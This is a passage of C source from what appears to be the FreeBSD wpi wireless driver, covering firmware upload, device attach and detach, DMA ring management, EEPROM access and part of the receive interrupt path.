le32toh(hdr->idatasz); btextsz = le32toh(hdr->btextsz); /* check that all firmware segments are present */ if (fp->datasize < sizeof (struct wpi_firmware_hdr) + rtextsz + rdatasz + itextsz + idatasz + btextsz) { device_printf(sc->sc_dev, "firmware file too short: %zu bytes\n", fp->datasize); error = ENXIO; /* XXX appropriate error code? 
*/ goto fail; } /* get pointers to firmware segments */ rtext = (const uint8_t *)(hdr + 1); rdata = rtext + rtextsz; itext = rdata + rdatasz; idata = itext + itextsz; btext = idata + idatasz; DPRINTFN(WPI_DEBUG_FIRMWARE, ("Firmware Version: Major %d, Minor %d, Driver %d, \n" "runtime (text: %u, data: %u) init (text: %u, data %u) boot (text %u)\n", (le32toh(hdr->version) & 0xff000000) >> 24, (le32toh(hdr->version) & 0x00ff0000) >> 16, (le32toh(hdr->version) & 0x0000ffff), rtextsz, rdatasz, itextsz, idatasz, btextsz)); DPRINTFN(WPI_DEBUG_FIRMWARE,("rtext 0x%x\n", *(const uint32_t *)rtext)); DPRINTFN(WPI_DEBUG_FIRMWARE,("rdata 0x%x\n", *(const uint32_t *)rdata)); DPRINTFN(WPI_DEBUG_FIRMWARE,("itext 0x%x\n", *(const uint32_t *)itext)); DPRINTFN(WPI_DEBUG_FIRMWARE,("idata 0x%x\n", *(const uint32_t *)idata)); DPRINTFN(WPI_DEBUG_FIRMWARE,("btext 0x%x\n", *(const uint32_t *)btext)); /* sanity checks */ if (rtextsz > WPI_FW_MAIN_TEXT_MAXSZ || rdatasz > WPI_FW_MAIN_DATA_MAXSZ || itextsz > WPI_FW_INIT_TEXT_MAXSZ || idatasz > WPI_FW_INIT_DATA_MAXSZ || btextsz > WPI_FW_BOOT_TEXT_MAXSZ || (btextsz & 3) != 0) { device_printf(sc->sc_dev, "firmware invalid\n"); error = EINVAL; goto fail; } /* copy initialization images into pre-allocated DMA-safe memory */ memcpy(dma->vaddr, idata, idatasz); memcpy(dma->vaddr + WPI_FW_INIT_DATA_MAXSZ, itext, itextsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* tell adapter where to find initialization images */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_DATA_BASE, dma->paddr); wpi_mem_write(sc, WPI_MEM_DATA_SIZE, idatasz); wpi_mem_write(sc, WPI_MEM_TEXT_BASE, dma->paddr + WPI_FW_INIT_DATA_MAXSZ); wpi_mem_write(sc, WPI_MEM_TEXT_SIZE, itextsz); wpi_mem_unlock(sc); /* load firmware boot code */ if ((error = wpi_load_microcode(sc, btext, btextsz)) != 0) { device_printf(sc->sc_dev, "Failed to load microcode\n"); goto fail; } /* now press "execute" */ WPI_WRITE(sc, WPI_RESET, 0); /* wait at most one second for the first alive notification */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "wpiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for adapter to initialize\n"); goto fail; } /* copy runtime images into pre-allocated DMA-sage memory */ memcpy(dma->vaddr, rdata, rdatasz); memcpy(dma->vaddr + WPI_FW_MAIN_DATA_MAXSZ, rtext, rtextsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* tell adapter where to find runtime images */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_DATA_BASE, dma->paddr); wpi_mem_write(sc, WPI_MEM_DATA_SIZE, rdatasz); wpi_mem_write(sc, WPI_MEM_TEXT_BASE, dma->paddr + WPI_FW_MAIN_DATA_MAXSZ); wpi_mem_write(sc, WPI_MEM_TEXT_SIZE, WPI_FW_UPDATED | rtextsz); wpi_mem_unlock(sc); /* wait at most one second for the first alive notification */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "wpiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for adapter to initialize2\n"); goto fail; } DPRINTFN(WPI_DEBUG_FIRMWARE, ("Firmware loaded to driver successfully\n")); return error; fail: wpi_unload_firmware(sc); return error; } /** * Free the referenced firmware image */ static void wpi_unload_firmware(struct wpi_softc *sc) { if (sc->fw_fp) { WPI_UNLOCK(sc); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); WPI_LOCK(sc); sc->fw_fp = NULL; } } static int wpi_attach(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; int ac, error, rid, supportsa = 1; uint32_t tmp; const struct wpi_ident *ident; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; if (bootverbose || 
WPI_DEBUG_SET) device_printf(sc->sc_dev,"Driver Revision %s\n", VERSION); /* * Some card's only support 802.11b/g not a, check to see if * this is one such card. A 0x0 in the subdevice table indicates * the entire subdevice range is to be ignored. */ for (ident = wpi_ident_table; ident->name != NULL; ident++) { if (ident->subdevice && pci_get_subdevice(dev) == ident->subdevice) { supportsa = 0; break; } } /* Create the tasks that can be queued */ TASK_INIT(&sc->sc_restarttask, 0, wpi_hwreset, sc); TASK_INIT(&sc->sc_radiotask, 0, wpi_rfreset, sc); WPI_LOCK_INIT(sc); callout_init_mtx(&sc->calib_to, &sc->sc_mtx, 0); callout_init_mtx(&sc->watchdog_to, &sc->sc_mtx, 0); /* disable the retry timeout register */ pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); rid = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); error = ENOMEM; goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); rid = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &rid, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); error = ENOMEM; goto fail; } /* * Allocate DMA memory for firmware transfers. */ if ((error = wpi_alloc_fwmem(sc)) != 0) { printf(": could not allocate firmware memory\n"); error = ENOMEM; goto fail; } /* * Put adapter into a known state. */ if ((error = wpi_reset(sc)) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail; } wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_PCIDEV); if (bootverbose || WPI_DEBUG_SET) device_printf(sc->sc_dev, "Hardware Revision (0x%X)\n", tmp); wpi_mem_unlock(sc); /* Allocate shared page */ if ((error = wpi_alloc_shared(sc)) != 0) { device_printf(dev, "could not allocate shared page\n"); goto fail; } /* tx data queues - 4 for QoS purposes */ for (ac = 0; ac < WME_NUM_AC; ac++) { error = wpi_alloc_tx_ring(sc, &sc->txq[ac], WPI_TX_RING_COUNT, ac); if (error != 0) { device_printf(dev, "could not allocate Tx ring %d\n",ac); goto fail; } } /* command queue to talk to the card's firmware */ error = wpi_alloc_tx_ring(sc, &sc->cmdq, WPI_CMD_RING_COUNT, 4); if (error != 0) { device_printf(dev, "could not allocate command ring\n"); goto fail; } /* receive data queue */ error = wpi_alloc_rx_ring(sc, &sc->rxq); if (error != 0) { device_printf(dev, "could not allocate Rx ring\n"); goto fail; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); error = ENOMEM; goto fail; } ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i */ /* XXX looks like WME is partly supported? */ #if 0 | IEEE80211_C_IBSS /* IBSS mode support */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WME /* 802.11e */ | IEEE80211_C_HOSTAP /* Host access point mode */ #endif ; /* * Read in the eeprom and also setup the channels for * net80211. 
We don't set the rates as net80211 does this for us */ wpi_read_eeprom(sc, macaddr); if (bootverbose || WPI_DEBUG_SET) { device_printf(sc->sc_dev, "Regulatory Domain: %.4s\n", sc->domain); device_printf(sc->sc_dev, "Hardware Type: %c\n", sc->type > 1 ? 'B': '?'); device_printf(sc->sc_dev, "Hardware Revision: %c\n", ((le16toh(sc->rev) & 0xf0) == 0xd0) ? 'D': '?'); device_printf(sc->sc_dev, "SKU %s support 802.11a\n", supportsa ? "does" : "does not"); /* XXX hw_config uses the PCIDEV for the Hardware rev. Must check what sc->rev really represents - benjsc 20070615 */ } if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = wpi_init; ifp->if_ioctl = wpi_ioctl; ifp->if_start = wpi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ieee80211_ifattach(ic, macaddr); /* override default methods */ ic->ic_raw_xmit = wpi_raw_xmit; ic->ic_wme.wme_update = wpi_wme_update; ic->ic_scan_start = wpi_scan_start; ic->ic_scan_end = wpi_scan_end; ic->ic_set_channel = wpi_set_channel; ic->ic_scan_curchan = wpi_scan_curchan; ic->ic_scan_mindwell = wpi_scan_mindwell; ic->ic_vap_create = wpi_vap_create; ic->ic_vap_delete = wpi_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), WPI_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), WPI_RX_RADIOTAP_PRESENT); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET |INTR_MPSAFE, NULL, wpi_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail; } if (bootverbose) ieee80211_announce(ic); #ifdef XXX_DEBUG ieee80211_announce_channels(ic); #endif return 0; fail: wpi_detach(dev); return ENXIO; } static int wpi_detach(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int ac; if (sc->irq != NULL) bus_teardown_intr(dev, sc->irq, sc->sc_ih); if (ifp != NULL) { ic = ifp->if_l2com; ieee80211_draintask(ic, &sc->sc_restarttask); ieee80211_draintask(ic, &sc->sc_radiotask); wpi_stop(sc); callout_drain(&sc->watchdog_to); callout_drain(&sc->calib_to); ieee80211_ifdetach(ic); } WPI_LOCK(sc); if (sc->txq[0].data_dmat) { for (ac = 0; ac < WME_NUM_AC; ac++) wpi_free_tx_ring(sc, &sc->txq[ac]); wpi_free_tx_ring(sc, &sc->cmdq); wpi_free_rx_ring(sc, &sc->rxq); wpi_free_shared(sc); } if (sc->fw_fp != NULL) { wpi_unload_firmware(sc); } if (sc->fw_dma.tag) wpi_free_fwmem(sc); WPI_UNLOCK(sc); if (sc->irq != NULL) bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); if (sc->mem != NULL) bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if (ifp != NULL) if_free(ifp); WPI_LOCK_DESTROY(sc); return 0; } static struct ieee80211vap * wpi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct wpi_vap *wvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; wvp = (struct wpi_vap *) malloc(sizeof(struct wpi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (wvp == NULL) return NULL; vap = &wvp->vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override with driver methods */ wvp->newstate = vap->iv_newstate; vap->iv_newstate = wpi_newstate; 
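	/* NB: wpi_newstate() does the device-side work and then chains to the saved net80211 handler via wvp->newstate. */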
ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void wpi_vap_delete(struct ieee80211vap *vap) { struct wpi_vap *wvp = WPI_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(wvp, M_80211_VAP); } static void wpi_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { if (error != 0) return; KASSERT(nsegs == 1, ("too many DMA segments, %d should be 1", nsegs)); *(bus_addr_t *)arg = segs[0].ds_addr; } /* * Allocates a contiguous block of dma memory of the requested size and * alignment. Due to limitations of the FreeBSD dma subsystem as of 20071217, * allocations greater than 4096 may fail. Hence if the requested alignment is * greater we allocate 'alignment' size extra memory and shift the vaddr and * paddr after the dma load. This bypasses the problem at the cost of a little * more memory. */ static int wpi_dma_contig_alloc(struct wpi_softc *sc, struct wpi_dma_info *dma, void **kvap, bus_size_t size, bus_size_t alignment, int flags) { int error; bus_size_t align; bus_size_t reqsize; DPRINTFN(WPI_DEBUG_DMA, ("Size: %zd - alignment %zd\n", size, alignment)); dma->size = size; dma->tag = NULL; if (alignment > 4096) { align = PAGE_SIZE; reqsize = size + alignment; } else { align = alignment; reqsize = size; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), align, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, reqsize, 1, reqsize, flags, NULL, NULL, &dma->tag); if (error != 0) { device_printf(sc->sc_dev, "could not create shared page DMA tag\n"); goto fail; } error = bus_dmamem_alloc(dma->tag, (void **)&dma->vaddr_start, flags | BUS_DMA_ZERO, &dma->map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate shared page DMA memory\n"); goto fail; } error = bus_dmamap_load(dma->tag, dma->map, dma->vaddr_start, reqsize, wpi_dma_map_addr, &dma->paddr_start, flags); /* Save the original pointers so we can free all the memory */ dma->paddr = dma->paddr_start; dma->vaddr = dma->vaddr_start; /* * Check the alignment and increment by 4096 until we get the * requested alignment. Fail if can't obtain the alignment * we requested. */ if ((dma->paddr & (alignment -1 )) != 0) { int i; for (i = 0; i < alignment / 4096; i++) { if ((dma->paddr & (alignment - 1 )) == 0) break; dma->paddr += 4096; dma->vaddr += 4096; } if (i == alignment / 4096) { device_printf(sc->sc_dev, "alignment requirement was not satisfied\n"); goto fail; } } if (error != 0) { device_printf(sc->sc_dev, "could not load shared page DMA map\n"); goto fail; } if (kvap != NULL) *kvap = dma->vaddr; return 0; fail: wpi_dma_contig_free(dma); return error; } static void wpi_dma_contig_free(struct wpi_dma_info *dma) { if (dma->tag) { if (dma->map != NULL) { if (dma->paddr_start != 0) { bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(dma->tag, dma->map); } bus_dmamem_free(dma->tag, &dma->vaddr_start, dma->map); } bus_dma_tag_destroy(dma->tag); } } /* * Allocate a shared page between host and NIC. 
*/ static int wpi_alloc_shared(struct wpi_softc *sc) { int error; error = wpi_dma_contig_alloc(sc, &sc->shared_dma, (void **)&sc->shared, sizeof (struct wpi_shared), PAGE_SIZE, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate shared area DMA memory\n"); } return error; } static void wpi_free_shared(struct wpi_softc *sc) { wpi_dma_contig_free(&sc->shared_dma); } static int wpi_alloc_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int i, error; ring->cur = 0; error = wpi_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, WPI_RX_RING_COUNT * sizeof (uint32_t), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: could not allocate rx ring DMA memory, error %d\n", __func__, error); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MJUMPAGESIZE, 1, MJUMPAGESIZE, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "%s: bus_dma_tag_create_failed, error %d\n", __func__, error); goto fail; } /* * Setup Rx buffers. */ for (i = 0; i < WPI_RX_RING_COUNT; i++) { struct wpi_rx_data *data = &ring->data[i]; struct mbuf *m; bus_addr_t paddr; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "%s: bus_dmamap_create failed, error %d\n", __func__, error); goto fail; } m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) { device_printf(sc->sc_dev, "%s: could not allocate rx mbuf\n", __func__); error = ENOMEM; goto fail; } /* map page */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m, caddr_t), MJUMPAGESIZE, wpi_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m); error = ENOMEM; /* XXX unique code */ goto fail; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); data->m = m; ring->desc[i] = htole32(paddr); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); return 0; fail: wpi_free_rx_ring(sc, ring); return error; } static void wpi_reset_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int ntries; wpi_mem_lock(sc); WPI_WRITE(sc, WPI_RX_CONFIG, 0); for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_RX_STATUS) & WPI_RX_IDLE) break; DELAY(10); } wpi_mem_unlock(sc); #ifdef WPI_DEBUG if (ntries == 100 && wpi_debug > 0) device_printf(sc->sc_dev, "timeout resetting Rx ring\n"); #endif ring->cur = 0; } static void wpi_free_rx_ring(struct wpi_softc *sc, struct wpi_rx_ring *ring) { int i; wpi_dma_contig_free(&ring->desc_dma); for (i = 0; i < WPI_RX_RING_COUNT; i++) { struct wpi_rx_data *data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } } static int wpi_alloc_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring, int count, int qid) { struct wpi_tx_data *data; int i, error; ring->qid = qid; ring->count = count; ring->queued = 0; ring->cur = 0; ring->data = NULL; error = wpi_dma_contig_alloc(sc, &ring->desc_dma, (void **)&ring->desc, count * sizeof (struct wpi_tx_desc), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx dma memory\n"); goto fail; } /* update shared page with ring's base address */ 
sc->shared->txbase[qid] = htole32(ring->desc_dma.paddr); error = wpi_dma_contig_alloc(sc, &ring->cmd_dma, (void **)&ring->cmd, count * sizeof (struct wpi_tx_cmd), WPI_RING_DMA_ALIGN, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx command DMA memory\n"); goto fail; } ring->data = malloc(count * sizeof (struct wpi_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate tx data slots\n"); goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, WPI_MAX_SCATTER - 1, MCLBYTES, BUS_DMA_NOWAIT, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { data = &ring->data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create tx buf DMA map\n"); goto fail; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); } return 0; fail: wpi_free_tx_ring(sc, ring); return error; } static void wpi_reset_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring) { struct wpi_tx_data *data; int i, ntries; wpi_mem_lock(sc); WPI_WRITE(sc, WPI_TX_CONFIG(ring->qid), 0); for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_TX_STATUS) & WPI_TX_IDLE(ring->qid)) break; DELAY(10); } #ifdef WPI_DEBUG if (ntries == 100 && wpi_debug > 0) device_printf(sc->sc_dev, "timeout resetting Tx ring %d\n", ring->qid); #endif wpi_mem_unlock(sc); for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } } ring->queued = 0; ring->cur = 0; } static void wpi_free_tx_ring(struct wpi_softc *sc, struct wpi_tx_ring *ring) { struct wpi_tx_data *data; int i; wpi_dma_contig_free(&ring->desc_dma); wpi_dma_contig_free(&ring->cmd_dma); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int wpi_shutdown(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); WPI_LOCK(sc); wpi_stop_locked(sc); wpi_unload_firmware(sc); WPI_UNLOCK(sc); return 0; } static int wpi_suspend(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int wpi_resume(device_t dev) { struct wpi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } /** * Called by net80211 when ever there is a change to 80211 state machine */ static int wpi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct wpi_vap *wvp = WPI_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; int error; DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate], sc->flags)); IEEE80211_UNLOCK(ic); WPI_LOCK(sc); if (nstate == IEEE80211_S_SCAN && vap->iv_state != IEEE80211_S_INIT) { /* * On !INIT -> SCAN transitions, we need to clear any possible * knowledge about associations. 
*/ error = wpi_config(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: device config failed, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_AUTH || (nstate == IEEE80211_S_ASSOC && vap->iv_state == IEEE80211_S_RUN)) { /* * The node must be registered in the firmware before auth. * Also the associd must be cleared on RUN -> ASSOC * transitions. */ error = wpi_auth(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "%s: could not move to auth state, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_RUN && vap->iv_state != IEEE80211_S_RUN) { error = wpi_run(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "%s: could not move to run state, error %d\n", __func__, error); } } if (nstate == IEEE80211_S_RUN) { /* RUN -> RUN transition; just restart the timers */ wpi_calib_timeout(sc); /* XXX split out rate control timer */ } WPI_UNLOCK(sc); IEEE80211_LOCK(ic); return wvp->newstate(vap, nstate, arg); } /* * Grab exclusive access to NIC memory. */ static void wpi_mem_lock(struct wpi_softc *sc) { int ntries; uint32_t tmp; tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp | WPI_GPIO_MAC); /* spin until we actually get the lock */ for (ntries = 0; ntries < 100; ntries++) { if ((WPI_READ(sc, WPI_GPIO_CTL) & (WPI_GPIO_CLOCK | WPI_GPIO_SLEEP)) == WPI_GPIO_CLOCK) break; DELAY(10); } if (ntries == 100) device_printf(sc->sc_dev, "could not lock memory\n"); } /* * Release lock on NIC memory. */ static void wpi_mem_unlock(struct wpi_softc *sc) { uint32_t tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp & ~WPI_GPIO_MAC); } static uint32_t wpi_mem_read(struct wpi_softc *sc, uint16_t addr) { WPI_WRITE(sc, WPI_READ_MEM_ADDR, WPI_MEM_4 | addr); return WPI_READ(sc, WPI_READ_MEM_DATA); } static void wpi_mem_write(struct wpi_softc *sc, uint16_t addr, uint32_t data) { WPI_WRITE(sc, WPI_WRITE_MEM_ADDR, WPI_MEM_4 | addr); WPI_WRITE(sc, WPI_WRITE_MEM_DATA, data); } static void wpi_mem_write_region_4(struct wpi_softc *sc, uint16_t addr, const uint32_t *data, int wlen) { for (; wlen > 0; wlen--, data++, addr+=4) wpi_mem_write(sc, addr, *data); } /* * Read data from the EEPROM. We access EEPROM through the MAC instead of * using the traditional bit-bang method. Data is read up until len bytes have * been obtained. */ static uint16_t wpi_read_prom_data(struct wpi_softc *sc, uint32_t addr, void *data, int len) { int ntries; uint32_t val; uint8_t *out = data; wpi_mem_lock(sc); for (; len > 0; len -= 2, addr++) { WPI_WRITE(sc, WPI_EEPROM_CTL, addr << 2); for (ntries = 0; ntries < 10; ntries++) { if ((val = WPI_READ(sc, WPI_EEPROM_CTL)) & WPI_EEPROM_READY) break; DELAY(5); } if (ntries == 10) { device_printf(sc->sc_dev, "could not read EEPROM\n"); return ETIMEDOUT; } *out++= val >> 16; if (len > 1) *out ++= val >> 24; } wpi_mem_unlock(sc); return 0; } /* * The firmware text and data segments are transferred to the NIC using DMA. * The driver just copies the firmware into DMA-safe memory and tells the NIC * where to find it. Once the NIC has copied the firmware into its internal * memory, we can free our local copy in the driver. 
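 * The sequence implemented by wpi_load_microcode() below is: write the
 * image at WPI_MEM_UCODE_BASE, program WPI_MEM_UCODE_{SRC,DST,SIZE},
 * set WPI_UC_RUN and poll WPI_TX_STATUS for WPI_TX_IDLE(6), then set
 * WPI_UC_ENABLE to let the microcode execute.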
*/ static int wpi_load_microcode(struct wpi_softc *sc, const uint8_t *fw, int size) { int error, ntries; DPRINTFN(WPI_DEBUG_HW,("Loading microcode size 0x%x\n", size)); size /= sizeof(uint32_t); wpi_mem_lock(sc); wpi_mem_write_region_4(sc, WPI_MEM_UCODE_BASE, (const uint32_t *)fw, size); wpi_mem_write(sc, WPI_MEM_UCODE_SRC, 0); wpi_mem_write(sc, WPI_MEM_UCODE_DST, WPI_FW_TEXT); wpi_mem_write(sc, WPI_MEM_UCODE_SIZE, size); /* run microcode */ wpi_mem_write(sc, WPI_MEM_UCODE_CTL, WPI_UC_RUN); /* wait while the adapter is busy copying the firmware */ for (error = 0, ntries = 0; ntries < 1000; ntries++) { uint32_t status = WPI_READ(sc, WPI_TX_STATUS); DPRINTFN(WPI_DEBUG_HW, ("firmware status=0x%x, val=0x%x, result=0x%x\n", status, WPI_TX_IDLE(6), status & WPI_TX_IDLE(6))); if (status & WPI_TX_IDLE(6)) { DPRINTFN(WPI_DEBUG_HW, ("Status Match! - ntries = %d\n", ntries)); break; } DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout transferring firmware\n"); error = ETIMEDOUT; } /* start the microcode executing */ wpi_mem_write(sc, WPI_MEM_UCODE_CTL, WPI_UC_ENABLE); wpi_mem_unlock(sc); return (error); } static void wpi_rx_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc, struct wpi_rx_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_rx_ring *ring = &sc->rxq; struct wpi_rx_stat *stat; struct wpi_rx_head *head; struct wpi_rx_tail *tail; struct ieee80211_node *ni; struct mbuf *m, *mnew; bus_addr_t paddr; int error; stat = (struct wpi_rx_stat *)(desc + 1); if (stat->len > WPI_STAT_MAXLEN) { device_printf(sc->sc_dev, "invalid rx statistic header\n"); ifp->if_ierrors++; return; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); head = (struct wpi_rx_head *)((caddr_t)(stat + 1) + stat->len); tail = (struct wpi_rx_tail *)((caddr_t)(head + 1) + le16toh(head->len)); DPRINTFN(WPI_DEBUG_RX, ("rx intr: idx=%d len=%d stat len=%d rssi=%d " "rate=%x chan=%d tstamp=%ju\n", ring->cur, le32toh(desc->len), le16toh(head->len), (int8_t)stat->rssi, head->rate, head->chan, (uintmax_t)le64toh(tail->tstamp))); /* discard Rx frames with bad CRC early */ if ((le32toh(tail->flags) & WPI_RX_NOERROR) != WPI_RX_NOERROR) { DPRINTFN(WPI_DEBUG_RX, ("%s: rx flags error %x\n", __func__, le32toh(tail->flags))); ifp->if_ierrors++; return; } if (le16toh(head->len) < sizeof (struct ieee80211_frame)) { DPRINTFN(WPI_DEBUG_RX, ("%s: frame too short: %d\n", __func__, le16toh(head->len))); ifp->if_ierrors++; return; } /* XXX don't need mbuf, just dma buffer */ mnew = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (mnew == NULL) { DPRINTFN(WPI_DEBUG_RX, ("%s: no mbuf to restock ring\n", __func__)); ifp->if_ierrors++; return; } bus_dmamap_unload(ring->data_dmat, data->map); error = bus_dmamap_load(ring->data_dmat, data->map, 